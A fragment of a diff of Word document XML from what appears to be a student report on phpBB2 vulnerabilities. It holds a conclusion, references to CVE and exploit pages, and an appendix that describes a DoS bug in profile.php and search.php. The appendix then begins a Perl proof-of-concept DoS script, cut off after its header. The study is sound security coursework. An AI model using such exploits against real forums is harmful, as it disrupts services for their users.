+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>PHP is vast</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ly integrated into web systems and even now new areas of exploitation are being discovered [</w:t>
+      </w:r>
+      <w:r>
+        <w:t>13</w:t>
+      </w:r>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. S</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ecurity standards have been maintained and refined</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ewer versions of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>to prevent such exploits.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Versions of PhpBB2 house many more severe security issues, some of which are only fixable by updating to a later version.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="29" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="29"/>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="30" w:name="_Toc446495301"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc448693189"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>References</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="30"/>
+      <w:bookmarkEnd w:id="31"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">[1] WAMP5. WAMP Homepage [online]. Available at </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId18" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://www.wampserver.com/en/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">] </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SourceForge</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> online repository</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> [online]</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId19" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://sourceforge.net/projects/phpbb/files/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">[2] </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Acunetrix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>, Software Security S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>canner</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [online]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>. Available at:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId20" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:lang w:val="en"/>
           </w:rPr>
-          <w:t>https://cxsecurity.com/issue/WLB-2009090082</w:t>
+          <w:t>http://www.acunetix.com/</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
         <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
           <w:lang w:val="en"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -2699,283 +6225,278 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>The possibility of the attacker carrying out CSRF (Cross Site Request Forgery) and gaining control of admin functionality.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="18"/>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>PhpBB</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2.0.19 Cross Site Request Forgeries and XSS Admin</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId11" w:history="1">
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">[4] OWASP, SQL Injection [online]. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId21" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:lang w:val="en"/>
           </w:rPr>
-          <w:t>http://joshduck.com/blog/2008/04/05/securing-your-php-code-xss/</w:t>
+          <w:t>https://www.owasp.org/index.php/SQL_Injection</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
+      <w:r>
+        <w:t xml:space="preserve">[5] CVE Details, phpBB2.0.19 DOS attack [online]. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId22" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>http://www.cvedetails.com/cve/CVE-2006-0450/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
           <w:color w:val="auto"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:color w:val="auto"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc446495298"/>
-      <w:bookmarkStart w:id="20" w:name="_Toc446495767"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="auto"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Penetration/Attack</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="19"/>
-      <w:bookmarkEnd w:id="20"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>DOS (Denial of Service attack)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc446495299"/>
-      <w:bookmarkStart w:id="22" w:name="_Toc446495768"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>Hardening exploits</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="21"/>
-      <w:bookmarkEnd w:id="22"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc446495300"/>
-      <w:bookmarkStart w:id="24" w:name="_Toc446495769"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>Conclusion</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="23"/>
-      <w:bookmarkEnd w:id="24"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">DDOS and DOS attacks are very resource intensive. As this is the most common form of hack software and systems are been hardened to increase the difficulty of performing such an attack. Injecting SQL code to the server side language is more a challenge to carry out although it is an ideal method for retrieve </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Notes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>LAMP architecture is made up of LINUX, APACHE, MySQL database management and PHP.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Version of PHP installed - phpBB2.0.23</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Local WAMP server installed and configured. This is just a windows based version of the LAMP server</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Any version of phpBB2.x security can be exploited by a CRSF (Cross-site request forgery) attack. Looked this up briefly </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">] </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Intelligent Exploit, phpBB2 DOS exploitation [online]</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>https://www.intelligentexploit.com/view-details.html?id=7671</w:t>
+          <w:t>https://www.intelligentexpl</w:t>
         </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr>
-          <w:color w:val="auto"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc446495301"/>
-      <w:bookmarkStart w:id="26" w:name="_Toc446495770"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>References</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="25"/>
-      <w:bookmarkEnd w:id="26"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">PHPBB 2.0.19 exploits. Available at: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>https://www.intelligentexploit.com</w:t>
+          <w:t>o</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>it.com/view</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>-</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>details.html?id=14321</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:hyperlink r:id="rId14" w:history="1">
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>[7]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Security Focus, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Admin command execution [online]. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId24" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>http://www.securityfocus.com/archive/1/431015/30/0/threaded</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>[8] CVE Details, phpBB2.0.19</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> signature exploit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [online]. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId25" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.cvedetails.com/cve/CVE-2006-1896/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">[9] Security Focus, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> template file code execution [online]. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId26" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://www.securityfocus.com/archive/1/archive/1/431017/100/0/threaded</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">[10] CVE Details, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">template file code execution </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">[online]. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId27" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.cvedetails.com/cve/CVE-2006-1895/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">[11] CX Security, [online]. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId28" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://cxsecurity.com/issue/WLB-2006020016</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[12]</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> CVE Details, CSRF remote attack [online]. </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId29" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.cvedetails.com/cve/CVE-2006-0438/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[13</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">] Threat Post, New exploits arrive for old PHP versions [online]. Available at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId30" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2994,28 +6515,2327 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc446495302"/>
-      <w:bookmarkStart w:id="28" w:name="_Toc446495771"/>
-      <w:r>
+      <w:bookmarkStart w:id="32" w:name="_Toc446495302"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
         <w:rPr>
           <w:color w:val="auto"/>
         </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="33" w:name="_Toc448693190"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
         <w:t>Appendix</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="27"/>
-      <w:bookmarkEnd w:id="28"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr>
-          <w:color w:val="auto"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="32"/>
+      <w:bookmarkEnd w:id="33"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">This one affected only versions </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uptill</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2.0.15. The exploit code </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>has</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> been recoded which affects the latest version too. The bug resides </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>in</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the following two scripts-</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>profile.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;&lt; By registering as many users as you can. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>search.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;&lt; By searching in a way that the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>db</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> cannot understand.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Proof </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Concept Code: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>======================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>#!/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>perl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">####################################### </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Recoded by: mix2mix and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Elioni</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> of http://ahg-khf.org </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## And h4cky0u Security Forums (http://h4cky0u.org) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Name: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phpBBDoSReloaded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Original Author: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>HaCkZaTaN</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> of Neo Security Team </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Tested on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2.0.19 and earlier versions </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Ported to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>perl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> by g30rg3_x </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Date: 25/01/06 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">####################################### </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>use</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> IO::Socket;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
